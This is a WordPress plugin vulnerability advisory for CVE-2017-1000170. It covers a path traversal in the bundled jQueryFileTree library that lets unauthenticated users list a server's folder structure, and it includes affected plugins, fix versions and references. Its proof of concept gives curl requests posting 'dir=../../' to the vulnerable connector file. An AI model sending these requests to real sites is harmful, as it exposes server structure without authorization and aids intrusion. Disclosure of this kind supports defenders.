Folders Disclosure via Outdated jQueryFileTree Library | CVE 2017-1000170 | Plugin Vulnerabilities

Description

The plugins are using the admin-page-framework framework which is shipped with the outdated and no longer maintained library jQueryFileTree known to be affected by a path traversal issue, allowing unauthenticated attackers to disclose the folder structure of the web server

Proof of Concept

curl 'https://example.com/wp-content/plugins/<affected-plugin>/<path-to-jQueryFileTree-lib>/connectors/jqueryFileTreePlus.php' -d "dir=../../" -e "xx"

e.g: curl 'https://example.com/wp-content/plugins/revision-manager-tmc/vendor/tmc/admin-page-framework/custom-field-types/path-custom-field-type/connectors/jQueryFileTreePlus.php' -d "dir=../../" -e "xx"

Affects Plugins

revision-manager-tmc

Fixed in 2.8.0

admin-page-framework

Fixed in 3.9.0

Fixed in 1.6.1

better-search-tmc

No known fix

faculty-weekly-schedule

Fixed in 1.2.0

No known fix

References

CVE

CVE-2017-1000170

URL

https://github.com/jqueryfiletree/jqueryfiletree/issues/66

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

063a4a32-e813-4929-9833-b2ce197c94ae

Timeline

Publicly Published

2022-03-01 (about 4 years ago)

Added

2022-03-01 (about 4 years ago)

Last Updated

2022-04-08 (about 4 years ago)

Other

Published

Title

Published

2025-10-15

Title

Download Counter Button <= 1.8.6.7 - Unauthenticated Arbitrary File Download

Published

2022-09-06

Title

BackupBuddy < 8.7.5 - Unauthenticated Arbitrary File Access

Published

2023-08-14

Title

Orders Tracking for WooCommerce < 1.2.6 - Admin+ Arbitrary File Access/Read

Published

2017-05-11

Title

Delightful Downloads <= 1.6.6 - Unauthenticated Path Traversal

Published

2015-08-28

Title

NextGen Gallery < 2.1.15 - Path Traversal